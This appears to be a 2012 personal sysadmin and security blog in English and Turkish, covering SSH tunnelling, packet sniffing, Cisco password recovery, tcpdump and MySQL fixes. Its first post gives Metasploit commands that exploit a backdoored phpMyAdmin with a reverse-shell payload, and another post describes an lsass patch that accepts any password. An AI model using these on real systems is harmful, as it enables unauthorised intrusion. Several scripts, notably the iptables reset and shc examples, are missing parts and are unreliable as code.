Thursday, September 27, 2012

phpMyAdmin server_sync.php Backdoor

One of the mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.

exploit for msf:

commands: use exploit/multi/http/phpmyadmin_3522_backdoor
                    set RHOST
                    set PATH /phpMyAdmin-
                    set PAYLOAD php/meterpreter/reverse_tcp
                    set LHOST

Monday, September 17, 2012

Tunnel into secure network (SSH TUNNEL)

This post will be a note to future Ali :)

 Lets think about a network which is protecting by firewall and this firewall only allowing specific ports and one of them is SSH.

Today at work, i had to access one of our branch campus with RDP and i could not put a NAT rule because of our change policy on network.

Sample Network Map

 In this scenario I could not make change on firewall so I use my internal SSH server as a agent.

I used ssh port forwarding feature and I tunneled my RDP traffic into ssh tunnel. Basically  my ssh server was connecting to RDP server but firewall was seeing only SSH traffic 

Anyway to cut long story short I used this command on my laptop to tunnel my RDP traffic to SSH server

ssh -L 3389:{ip of windows server}:3389 {ip of ssh server} -l {ssh user} -N

Basically, i used this command ssh -L 3389: -l root -N. After that i open my RDP client and I tried to connect

This command made my laptop listen tcp port 3389 and forward to my SSH server and my SSH server was forwarding all the traffic as well.

Saturday, September 15, 2012

Packet Sniffing Basics

Your data isn't safe on public networks. You may not even realize the extent to which that statement is true.

Imagine this: you're sitting in your local coffee shop sucking down your morning caffeine fix before heading into the office. You catch up on your work e-mail, you check Facebook and you upload that financial report to your company's FTP server. Overall, it's been a constructive morning. By the time you get to work, there's a whirlwind of chaos throughout the office. That incredibly sensitive financial report you uploaded was somehow leaked to the public, and your boss is outraged by the crass and unprofessional e-mail you just sent him. Was there some hacker lurking in the shadows that broke into your company's network and decided to lay the blame on you? More than likely not. This mischievous ne'er-do-well probably was sitting in the coffee shop you stopped at and seized the opportunity.
Without some form of countermeasures, your data isn't safe on public networks. This example is a worst-case scenario on the far end of the spectrum, but it isn't so far-fetched. There are people out there who are capable of stealing your data. The best defense is to know what you can lose, how it can get lost and how to defend against it.

What Is Packet Sniffing?

Packet sniffing, or packet analysis, is the process of capturing any data passed over the local network and looking for any information that may be useful. Most of the time, we system administrators use packet sniffing to troubleshoot network problems (like finding out why traffic is so slow in one part of the network) or to detect intrusions or compromised workstations (like a workstation that is connected to a remote machine on port 6667 continuously when you don't use IRC clients), and that is what this type of analysis originally was designed for. But, that didn't stop people from finding more creative ways to use these tools. The focus quickly moved away from its original intent—so much so that packet sniffers are considered security tools instead of network tools now.
Figure 1. A Capture of a Packet of Someone Trying to Log In to a Web Site
Finding out what someone on your network is doing on the Internet is not some arcane and mystifying talent anymore. Tools like Wireshark, Ettercap or NetworkMiner give anybody the ability to sniff network traffic with a little practice or training. These tools have become increasingly easy to use and continue to make things easier to comprehend, which makes them more usable by a broader user base.

Figure 2. Tools like NetworkMiner can reconstruct images that have been broadcast on the network.

How Does It Work?

Now, you know that these tools are out there, but how exactly do they work? First, packet sniffing is a passive technique. No one actually is attacking your computer and delving through all those files that you don't want anyone to access. It's a lot like eavesdropping. My computer is just listening in on the conversation that your computer is having with the gateway.
Typically, when people think of network traffic, they think that it goes directly from their computers to the router or switch and up to the gateway and then out to the Internet, where it routes similarly until it gets to the specified destination. This is mostly true except for one fundamental detail. Your computer isn't directly sending the data anywhere. It broadcasts the data in packets that have the destination in the header. Every node on your network (or switch) receives the packet, determines whether it is the intended recipient and then either accepts the packet or ignores it.
For example, let's say you're loading the Web page on your computer “PC”. Your computer sends the request by basically shouting “Hey! Somebody get me!”, which most nodes simply will ignore. Your switch will pass it on to where it eventually will be received by, which will pass back its index page to the router, which then shouts “Hey! I have for PC!”, which again will be ignored by everyone except you. If others were on your switch with a packet sniffer, they'd receive all that traffic and be able to look at it.
Picture it like having a conversation in a bar. You can have a conversation with someone about anything, but other people are around who potentially can eavesdrop on that conversation, and although you thought the conversation was private, eavesdroppers can make use of that information in any way they see fit.

What Kind of Information Can Be Gathered?

Most of the Internet runs in plain text, which means that most of the information you look at is viewable by someone with a packet sniffer. This information ranges from the benign to the sensitive. You should take note that all of this data is vulnerable only through an unencrypted connection, so if the site you are using has some form of encryption like SSL, your data is less vulnerable.
The most devastating data, and the stuff most people are concerned with, is user credentials. Your user name and password for any given site are passed in the clear for anyone to gather. This can be especially crippling if you use the same password for all your accounts on-line. It doesn't matter how secure your bank Web site is if you use the same password for that account and for your Twitter account. Further, if you type your credit-card information into an unsecure Web page, it is just as vulnerable, although there aren't many (if any) sites that continue this practice for that exact reason.
There is a technique in the security world called session hijacking where an attacker uses a packet sniffer to gain access to a victim's session on a particular Web site by stealing the victim's session cookie for that site. For instance, say I was sniffing traffic on the network, and you logged in to Facebook and left the Remember Me On This Computer check box checked. That signals Facebook to send you a session cookie that your browser stores. I potentially could collect that cookie through packet sniffing, add it to my browser and then have access to your Facebook account. This is such a trivial task that it can be scripted easily (someone even has made a Firefox extension that will do it automatically), and there still aren't many Web sites that encrypt their traffic to the end user, making it a significant problem when using the public Internet.
Packet sniffers exist that are specifically designed for monitoring what you are up to on the Internet. They will rebuild the exact Web page you are looking at, photos you're browsing, videos you're watching, and even files you're downloading. These applications are tailored to look through a string of packet captures to find various packet streams and reassemble them on the fly. My roommate in college whipped up something that would display the contents of my browser in real time on his computer (a scary revelation indeed).
E-mail is another one of those things that people tend to get up in arms about because there's an assumption of privacy in e-mail that is derived from the regular mail system. Your e-mail is sent out and viewable, just like anything else that emanates from your computer of the network. E-mail sniffing is what made the FBI's Carnivore program so infamous.

Since every packet bears a destination address in its header, it's possible that someone could sniff the network just to gather a browsing history of everyone on that segment. This may not be very insidious, but it's gathered data, and there's always someone willing to pay for all sorts of data.


I'm sure you're currently seconds from taking a pair of scissors to your network cable and swearing off the Internet for life, but fear not! There are less-drastic measures you can take to prevent such sensitive data loss. None of these precautions is the magic cure for eavesdroppers, but using even one of them will make you a less-desirable target. There's an old joke that says that when you're being chased by a bear, you don't need to outrun the bear, just the guy in front of you. You don't have to have the most secure computer on the block, just more secure than somebody else's. As with most network security, if people really want your data, they can get at it. However, most of the time, attackers aren't targeting a specific person, they're looking for targets of opportunity, so the more secure you are, the less likely you are to be such a target.
The first defense against eavesdropping is the Secure Socket Layer (SSL) used by most Web pages that handle sensitive information. This forces all the content shared back and forth between you and the site to be encrypted. Some sites use SSL for their login pages only. Most sites don't even use SSL at all. It's easy to tell—the URL in the address bar will start with https instead of http. Some sites offer you some choice in the matter. For instance, Google allows you to turn SSL on all the time within Gmail, thus encrypting all your e-mail traffic.
Modern network switches are designed to pass data intelligently to avoid packet collisions and excessive network traffic. If a packet is broadcast that is not intended for one of the nodes attached to it, the router will not rebroadcast to the local nodes. Likewise, if a packet is broadcast locally that is intended for another local node, the switch will not rebroadcast to the outside network. This forces strict segmentation on a network. For us, this means that someone using a packet sniffer on a switched network will not see any traffic from hosts not attached to the same switch. This doesn't mean much on small-scale networks, like you have at your house, but on a larger scale, it means that somebody can't sit in the breakroom sniffing traffic three floors up from the accounting department.
Wireless network encryption has come a long way in its short lifespan—going from no encryption to Wired Equivalent Privacy (WEP) encryption to Wi-Fi Protected Access (WPA) encryption. Wireless networks don't provide the same segmentation that the previously mentioned switches provide, meaning that any packet transmitted on a wireless access point gets rebroadcast to everyone else on the access point. Even though your traffic is encrypted under WEP, this encryption protects only the data from users not connected to that wireless network. The encryption scheme and key are identical for all users, so all your “encrypted” data is decryptable by anyone on the network, making your data essentially unencrypted. WPA solves this issue by isolating all users on the network and giving them a different encryption scheme even when the key is the same.
If you have SSH access to a computer outside your current network (which I'm sure most of us do), you can tunnel all your traffic through an SSH connection. You essentially are using the encryption of the SSH connection to protect all your data from eavesdroppers. There are two apparent downsides to this technique. First, you're connection speed will drop, because now instead of going from you to the destination and back, your traffic will go from you to the SSH server to the destination and back. Second, your data is transmitted unencrypted from the remote end, so if that machine is vulnerable to packet sniffing, your data is no safer than it was at your local machine.
Virtual private networks are intended to allow users access to a network that otherwise would be inaccessible. However, they also can be used to protect your traffic, because VPN connections are encrypted. You can set up a private VPN for yourself just for this purpose, but it will have the same disadvantages as SSH tunneling. If you work for a company that has a VPN, you may be allowed to use it for this purpose, but your traffic will fall under the same policy and rules that you have in your office, so be careful what you use it for.

This document written by Adrian Hannah

Tuesday, May 22, 2012

Offending olan SSH anahtarinin silinmesi

Merhaba daha once baglandiginiz bir ip adresinde tekrar baglandiginiz sisteminizde
kayitli olan key sistem uzerinde olan key den farkli ise asagidaki gibi bir uyari alirsiniz
bunu kolayca silmek isin asagidaki komutu kullanabilirsiniz!

Someone could be eavesdropping on you right now 
(man-in-the-middle attack)!
It is also possible that the RSA host key has just been 
changed. The fingerprint for the RSA key sent by the remote host 
is a9:b5:f9:a6:06:76:12:56:8c:0a:95:c5:31:e5:gd:87. 
Please contact your system administrator.
Add correct host key in /home/ramesh/.ssh/known_hosts to get 
rid of this message.
Offending key in /home/akapucu/.ssh/known_hosts: 14 
Permission denied (publickey,password). 
# sed -i '14d' ~/.ssh/known_hosts
Bu komutla 14. satirda bulunan ssh anahtarini silmis oldunuz.!

Wednesday, May 16, 2012

How to Encrypt Your Bash Shell Script on Linux Using SHC

Q: How do I encrypt my bash shell script on Linux environment? The shell script contains password, and I don’t want others who have execute access to view the shell script and get the password. Is there a way to encrypt my shell script?

A: First, as a best practice you should not be encrypting your shell script. You should really document your shell script properly so that anybody who views it understands exactly what it does. If it contains sensitive information like password, you should figure out a different approach to write the shell script without having to encrypt it.
That being said, if you still insist on encrypting a shell script, you can use SHC utility as explained below. Please note that encrypted shell script created by shc is not readable by normal users. However someone who understands how this works can extract the original shell script from the encrypted binary created by shc.
SHC stands for shell script compiler.

1. Download shc and install it

Download shc and install it as shown below.
# wget
# tar xvfz shc-3.8.7.tgz
# cd shc-3.8.7
# make
Verify that shc is installed properly.
$ ./shc -v
shc parse(-f): No source file specified

shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] 
[-rvDTCAh] -f 

2. Create a Sample Shell Script

Create a sample bash shell script that you like to encrypt using shc for testing purpose.
For testing purpose, let us create the following shell script which generates random numbers. You have to specify how many random numbers you like to generate.
$ vi

echo -n "How many random numbers do you want to generate? "
read max

for (( start = 1; start <= $max; start++ ))
  echo -e $RANDOM

$ ./
How many random numbers do you want to generate? 3

3. Encrypt the Shell Script Using shc

Encrypt the shell scripting using shc as shown below.
$ ./shc -f
This will create the following two files:
$ ls -l*
-rwxrw-r--. 1 ramesh ramesh   149 Mar 27 01:09
-rwx-wx--x. 1 ramesh ramesh 11752 Mar 27 01:12
-rw-rw-r--. 1 ramesh ramesh 10174 Mar 27 01:12
  • is the original unencrypted shell script
  • is the encrypted shell script in binary format
  • is the C source code of the file. This C source code is compiled to create the above encrypted file. The whole logic behind the shc is to convert the shell script to C program (and of course compile that to generate the executable)
$ file Bourne-Again shell script text executable

$ file ELF 64-bit LSB executable, x86-64, version 1 (SYSV), 
dynamically  linked (uses shared libs), for GNU/Linux 2.6.18, 

$ file ASCII C program text

4. Execute the Encrypted Shell Script

Now, let us execute the encrypted shell script to make sure it works as expected.
$ ./
How many random numbers do you want to generate? 3
Please note that the binary itself is still dependent on the shell (the first line provided in the i.e /bin/bash) to be available to execute the script.

5. Specifying Expiration Date for Your Shell Script

Using shc you can also specify an expiration date. i.e After this expiration date when somebody tries to execute the shell script, they'll get an error message.
Let us say that you don't want anybody to execute the after 31-Dec-2011 (I used last year date for testing purpose).
Create a new encrypted shell script using "shc -e" option to specify expiration date. The expiration date is specified in the dd/mm/yyyy format.
$ ./shc -e 31/12/2011 -f
In this example, if someone tries to execute the, after 31-Dec-2011, they'll get a default expiration message as shown below.
$ ./
./ has expired!
Please contact your provider
If you like to specify your own custom expiration message, use -m option (along with -e option as shown below).
$ ./shc -e 31/12/2011 -m "Contact [email protected] for new 
version of this script" -f

$ ./
./ has expired!
Contact [email protected] for new version of this script

6. Create Redistributable Encrypted Shell Scripts

Apart from -e, and -m (for expiration), you can also use the following options:
  • -r will relax security to create a redistributable binary that executes on other systems that runs the same operating system as the one on which it was compiled.
  • -T will allow the created binary files to be traceable using programs like strace, ltrace, etc.
  • -v is for verbose
Typically you might want to use both -r and -T option to craete a redistributable and tracable shell encrypted shell script as shown below.
$ ./shc -v -r -T -f
shc shll=bash
shc [-i]=-c
shc [-x]=exec '%s' "[email protected]"
shc [-l]=
shc opts=
shc: cc -o
shc: strip
shc: chmod go-r

$ ./
How many random numbers do you want to generate? 3
Finally, it is worth repeating again: You should not be encrypting your shell script in the first place. But, if you decided to encrypt your shell script using shc, please remember that a smart person can still generate the original shell script from the encrypted binary that was created by shc.


Wednesday, May 9, 2012

ls order by time

Sort by time newest first

[[email protected] log]# ls -lt
total 3788
-rw------- 1 root root 153211 Dec 21 13:20 cron
-rw------- 1 root root 3725 Dec 21 13:06 secure
-rw------- 1 root root 20864 Dec 21 13:06 messages
-rw-r----- 1 mysql mysql 8641 Dec 21 13:06 mysqld.log
-rw-r--r-- 1 root root 11462 Dec 21 13:06 yum.log
drwxrwxr-x 2 tomcat tomcat 4096 Dec 21 13:05 tomcat5
-rw------- 1 root utmp 379008 Dec 21 13:05 btmp
-rw-rw-r-- 1 root utmp 35712 Dec 21 13:05 wtmp
-rw------- 1 root root 0 Dec 21 13:04 faillog
-rw------- 1 root root 0 Dec 21 13:04 tallylog
-rw-r--r-- 1 root root 2921168 Dec 21 13:01 lastlog
-rw------- 1 root root 5869 Dec 20 01:00 rkhunter.log
-rw------- 1 root root 0 Dec 19 03:20 boot.log
-rw------- 1 root root 0 Dec 19 03:20 maillog
drwxrwsr-x 2 root mailman 4096 Dec 19 03:20 mailman
-rw------- 1 root root 0 Dec 19 03:20 spooler
drwxr-x--- 2 sso root 4096 Dec 19 03:20 sso
-rw------- 1 root root 443960 Dec 19 03:20 cron.1
-rw------- 1 root root 5239 Dec 17 17:04 secure.1

Sort by time newest last
[[email protected] log]# ls -ltr
total 3788
-rw-r--r-- 1 root root 0 Jun 25 15:00 dmesg
drwxr-xr-x 2 apache apache 4096 Jun 25 15:07 atmail
drwxr-xr-x 2 root root 4096 Jun 28 03:56 mail
-rw-r--r-- 1 root root 0 Jul 26 05:15 xferlog
-rw-rw-r-- 1 root utmp 1288320 Aug 25 03:14 wtmp.1
drwx------ 2 root root 4096 Aug 30 12:32 httpd
drwxr-x--- 2 apache apache 4096 Sep 2 03:20 psa-horde
drwx------ 2 root root 4096 Sep 15 04:46 samba
-rw------- 1 root root 0 Nov 21 03:20 spooler.4
-rw------- 1 root root 0 Nov 21 03:20 secure.4
-rw------- 1 root root 0 Nov 21 03:20 maillog.4
-rw------- 1 root root 0 Nov 21 03:20 boot.log.4
-rw------- 1 root root 4407 Nov 27 13:58 messages.4
-rw------- 1 root root 443981 Nov 28 03:20 cron.4
-rw------- 1 root root 0 Nov 28 03:20 spooler.3
-rw------- 1 root root 0 Nov 28 03:20 maillog.3
-rw------- 1 root root 0 Nov 28 03:20 boot.log.3
-rw------- 1 root root 1153 Dec 2 16:41 secure.3
-rw------- 1 root root 6841 Dec 4 19:38 messages.3

WPA Hole 169

Security Word recently found vulnerability on WPA2 Enterprise encryption. Researchers have found vulnerability in the WPA2 encryption protocol. It is currently the strongest encryption way and is used in many many businesses and homes out the world. They are calling to the vulnerability as hole 196 because the vulnerability was discovered on page 196 of the 802.11 IEEE standard.
If you read the details of the exploit, you will learn that hackers must be authenticated and authorized on the WPA2 network to begin with. Once authorized, the user can use exploits to decrypt and/ or inject packets which are malicious into other users “secure” wireless traffic. It means the vulnerability can be exploited by a man-in-the middle attack according the researcher, this means that an unauthorized user can decrypt packets and sniffing the network using open source software.
WPA2 knows as the most secure Wireless encryption method available today. So this is big, big news. Hole 196 is zero-day now which means the security researchers have not yet found a patch for the vulnerability.

Iptables'ı resetleme

Merhaba arkadaşlar büyük ihtimalle bir çok iptables kullanıcının başına gelmiştir sistemi kendi kullanımına kilitlemek. Bir çok kez benimde başıma geldi ve Cisco routerlarda gördüğüm bir özellik bana çok basit pratik bir fikri getirdi aklıma. O kodu tam hatırlamıyorum ama yapmış olduğunuz configurasyon dosyasını test etmeniz için bir  komut; Çalışan config dosyasını aktif ediyor ancak startup confige yazmıyor böylelikle sizin belirtiğiniz süre içinde reset atıp eski config dosyanıza geri dönmenizi sağlıyor. Hatırlayan olursa bi zahmet yazıversin bana :) Neyse konumuza geri dönelim kullandığımız script çok basit iptables’ı sıfırlıyor tabi cronjob a bunu atıyoruz çalışamaya başlamadan olurda kendimizi kilitlersek diye :)

# Firewallumuzu olduğu gibi bırakmak için aşağıdaki durum değerini 0 bırakıyoruz.
# Firewallumuzu resetlemek istiyorsak durum degeri 1 olmalı ki döngüye girip firewallu sıfırlasın.
# Centos Redhat ve Fedora sistemler dışındaki dağıtımlar için değerimiz "hayir" olucak
# Ben Centos kullandığım için benim değerim evet
if [ "$durum" == "1" ];
if [ "$sistem" == "evet" ];
# Firewall'u durdurmak için
/etc/init.d/iptables stop
# Diğer linux distroları için aşağıdaki kodları kullanıyor.
$yol -F
$yol -X
$yol -Z
for tablo in $(/proc/net/ip_tables_names)
$yol -t $tablo -F
$yol -t $tablo -X
$yol -t $tablo -Z


Çalıştırma izni için

chmod +x /root/

Bu dosyamızı 5 dk da bir çalıştırmak için /etc/crontab altına
*/5 * * * * root /root/ satırını ekliyoruz.
Önemli nokta: Çalışmaya başlamadan önce yukarıdaki durumu dikkate alınız!!!

Human Factor on the Security System

The Problem with Technology and the Human Factor

Some organizations see the solution to information security problems as a technical problem. Several suppliers propose the same idea with technical solutions. The technologies of the security manager are firewalls, antivirus software, PKI systems, and VPN. All of them are valuable and protecting their network. If technology is fallible like humans, the technology is equal to the person who knows how to use it.
Computer Security

Everyone should have security on their computers and networks. There are several shortcomings that view. Even the software can be perfect, it would still have problems from hacker, testers, viruses and software mistakes. They will find unchecked memory, backdoors, and other weaknesses in commercial and in-house developed software. The problem is multiplied by the complication of modern information technology systems. Organizations that use multi-layered security are going the right direction, but it is hard for every layer of protection to be perfect. Protection of the organizing systems needs intelligent users that do not create security bug for their systems.
Many organizations really don’t understand their information security problems. They do not have all the information to make sure that they know exactly the right technical solution to a problem. They recognize the need for standard information security software; however they rarely have basic information of requirements. They buy firewalls for protection only with no care to monitor security alarms, update attack signatures, or respond to new forms of network traffic. They scan emails for viruses but ignore JavaScript. For a good security you need to educate your workers about worms, spam mails viruses etc.
The term “Technical solution” brings high unrealistic expectations because technology requires the human keep it up to date. Custom-made security technology is extremely expensive, while standard cheap software is not as good and offer little advantage to custom-made security technology.  It puts creating the best technology out of the hands of the uneducated people, because the people are stuck with below standard technology when they do not know better. Last but not least, someone has to use this technology. This can bring big problems, because people can make mistakes.
Information Security is not much different from security in general. After all, no one would put heavy security on something not important.  For example, who would put a heavy security lock on a box if it only has something as unimportant as a rock? Also, if a car looks good but has a broken window, then the whole car is not safe, just like the information security. Protection against cyber attacks works on the same idea. All weak points should be secured whether on a desktop computer, an organization’s server, or a corporate network.  Information should also be entered through safe paths.
Human Factor on the Security System

There are a lot of security software in the world, for example there is firewalls, intrusion detection systems, anti viruses etc. All types of software designed are made to do a certain function. This software will help protect a system. However, even the best software cannot guarantee a hundred percent system security. Even with the most advanced technology and passwords cannot be a hundred percent safe. This is because people made the system and they can make mistakes. So, people are the weakest part of technology.
The human factor is the main reason why attacks on many computers and systems are successful. There are many great examples, hackers, virus writers, and dangerous users use the human factor to their advantage. Therefore, they use people to penetrate systems.
Some Examples about Security

Many people do not understand why using software with many weaknesses poses a security risk to their computer or system. The many computer users see their computer as an object. They want to use it as a washer, a microwave, or any other simple device. They don’t want to know how it works. Even if they do, they would not know how it works like other objects they use. They just think that if they install a system that protect against viruses and software without weaknesses, they’ll have nothing to worry about.
Not knowing the problems of threats is only part of the problem. The human factor also comes into play. Many bad code starts to show at the drafting stage, especially when they create security policies and procedures. The security of wireless networks is in a poor state. Many errors were made when wireless protocols were being made. There is much written about them having bad program errors. While programmers and testers continue to find bypass security, new exploits will be found. Even the most developed software will be used, but again the human factor will be there. If you have a poorly trained system administrator and user, the best firewall or other protection systems in the world will not protect your system.
The way users treat confidential information is a careless approach to security. A similar situation can be shown in everyday life. An example is a person leaving their keys on the door. A lot of systems use an empty or weak password. Some systems have the user’s name as the password just to access their system easily. Even when users use a complicated password which no one can think, they write their password on a paper or they forget it, therefore other users can find their passwords.
Another human sense which hackers use is that humans are curious. Many of us find email worms at some time in our life. We know that these worms arrive as attachments to infected messages. Sending the virus out is only having of what the virus writer has to do. The worm has to be activated to multiply through the system and to other computers. It could be activated by opening the attachment. You might think that users might become worried when seeing attachments to unexpected email.  But surprisingly, the hackers know how to use our curiosity.
It is interesting that people open unprotected e-mails even if they are not supposed to. However, the numbers of people who open the e-mails are always the same. This can be explained by the fact that virus writers find new ways to trick people. On the other hand, viruses do not only infect e-mail message, but you can also find them all over the internet.

Computers are becoming more common every day. Hacking is becoming more dangerous day to day. Hacking technologies is becoming more complex. Creating a good security system is not easy. There are many weak points in the system which is a never-ending process to protect. There is always new technology being developed. They are use to solve problems. They have their disadvantages too. Hackers, virus writers, dangerous users invent new ways to exploit the security software being used. The result is a war between cyber criminals and security professionals.  It does not matter if you have the best security product or a professional security engineer, technology is only as good with users that know what they are doing.
Ali Kapucu
Cisco Router Şifresi Kırma Router’ın enable secret şifresini unuttuysanız veya yeni aldığınız ikinci el router’a birileri şifre vermiş ve siz bunu bilmiyorsanız bu router’da konfigürasyon yapabilmek
için şifresini kırmanız gerekli. Eğer router’ımız içindeki konfigürasyon bizim için önemliyse onu da
kaybetmememiz gerekir. Aşağıda adım adım varolan konfigürasyonu kaybetmeden bir
router’ın şifresi nasıl kırılır onu öğreneceğiz. İlk yapmamız gereken router açılırken IOS (işletim sistemi)’in yüklenmemesini sağlamak olacaktır bunun için açılıs sırasında
CTRL+BREAK (CTRL+C) tuşlarına
basılır. Bu işlem ile cihazımız mini IOS denen sınırlı işlemlerin yapılabileceği işletim
sistemi ile açılır. Şimdi komut satırına yazacağımız o/r 0×2142 komutu ile configuration-register’ı
değiştiririz. Artık router’ımız açılışta NVRAM’den konfigürasyonu yüklemeyecektir.
Router’ı kapatım açalım. Şimdi eski çalışan konfigürasyonumuz yüklenemediği
için IOS bize adım adım yeni bir konfigürasyon oluşturmak isteyip istemeyeceğimizi
soruyor. Bu soruya No cevabı verdikten sonra default komut satırımız olan router>
karşımıza çıkar.
yazıp enter’a bastığımızda artık şifresiz bir şekilde enable mode’a
geçmiş oluruz. Peki eski konfigürasyonumuz ne olacak?
Eski konfigürasyonumuz hala NVRAM içinde kayıtlıdır. Biz şu anda Runnin-
Config içindeyiz. Eski konfigürasyonumuzu geri almak için yapacağımız işlem çok
basit. Startup-Config içindeki konfigürasyonu Running-Config üzerine
kopyalayacağız. Bunun için aşağıdaki komutu vermeniz yeterlidir.
router#copy startup-config running-config
Tamam eski konfigürasyonu kurtardık. Şimdide yeniden bir enable secret şifresi
verelim. Bunun için global configuration mod’a geçmemiz gerekiyor.
router#configure terminal
komutu ile global configuration moda geçilir.
router(config)#enable secret şifreniz 
komutuyla da yeni enable secret şifenizi verebilirsiniz.         Bu işlemden sonra tekrar enable mod’a geçip RAM’de çalışan konfigürasyonu
NVRAM’e kaydetmemiz gerekiyor ki router kapanıp açılınca yaptığımız ayarlarla
router#copy running-config startup-config 
Yukarıdaki işlemle kopyalamayı tamamlamış oluyoruz. Hem eski konfigüraysonu
kurtardık hemde enable secret şifremizi yeniledik. Yapmamız gereken son bir işlem
kaldı. Configuration Register’ı eski haline çevirmek. Bunun için tekrar global
configuration mod’a geçip aşağıdaki satırı yazmamız yeterli olacaktır.
router#configure terminal
router(config)#configuration-register 0×2102
Bu son işlemden sonra router’ımızı kapatıp açarsak yeni enable secret şifresi ve
eski konfigürasyonumuzla çalışmaya devam edebiliriz.
Hepinize kolay gelsin,

Tcpdump ile ssh ve https dışında trafiği izleme

Merhabalar network işi ile uğraşan bir çok kişi ağını monitör ederken tcpdump’ı kullanmıştır ancak bazen ağımızdaki şifreli trafik gereksiz (ssh, https) yere tcpdump da yer kaplar ve çıktıda gürültü oluşturur. İşte burada tcpdump’ın ek parametrelerini kullanarak ssh ve https dışında trafiği izleyebiliriz.

tcpdump -i venet0:0 port not 22

ile 22. port dışında trafiği izleyebiliriz. Ayrıca;

tcpdump -i venet0:0 port not 22 and port not 53

bir kaç portu izlemeyi engelleyebiliriz.

tcpdump -i venet0:0 port not 22 and host

ile host adresi de ekleyebiliriz.

Can’t start server : Bind on unix socket: Permission denied

Geçenlerde uğraştığım bir bir linux sunucuda mysql start ile ilgili error logları alıyordum. Almış olduğum hata:
[ERROR] Can’t start server : Bind on unix socket: Permission denied 
[ERROR] Do you already have another mysqld server running on socket: /var/lib/mysql/mysql.sock ? 
[ERROR] Aborting

Aynı şekilde şu şekilde de bir hata mevcuttu

Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’ (2)

Sorun loglardan anlaşılacağı gibi mysql.sock dosyasının perm ayarlarıyla ilgili buna çözüm olarak yapılacak şey; 1. Öncelikle soket dosyasını sildiğimizden emin olalım.
rm /var/lib/mysql/mysql.sock
2. Mysql processes lerini durduralım bunuda aşağıdaki komut ile yapabilirsiniz.
killall -e -9 mysql
3. /var/lib altındaki mysql klasörünün user ve grubunun mysql ve root olduğundan emin olalım. bunuda /var/lib altındayken aşağıdaki komut ile yapıyoruz.
chown mysql:root mysql
4. Mysql servisini tekrar çalıştırıyoruz.
service mysql start
Mysql dosyaları bazen farklı klasörler altunda olabilir bu yüzden hangi klasör altında çalıştığından emin olunuz bunuda
locate mysql
ile yapabilirsiniz.

Screen Unlock Meterpreter Script

In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author’s blog has more details. Thanks go out to PaulDotCom for uploading this to vimeo.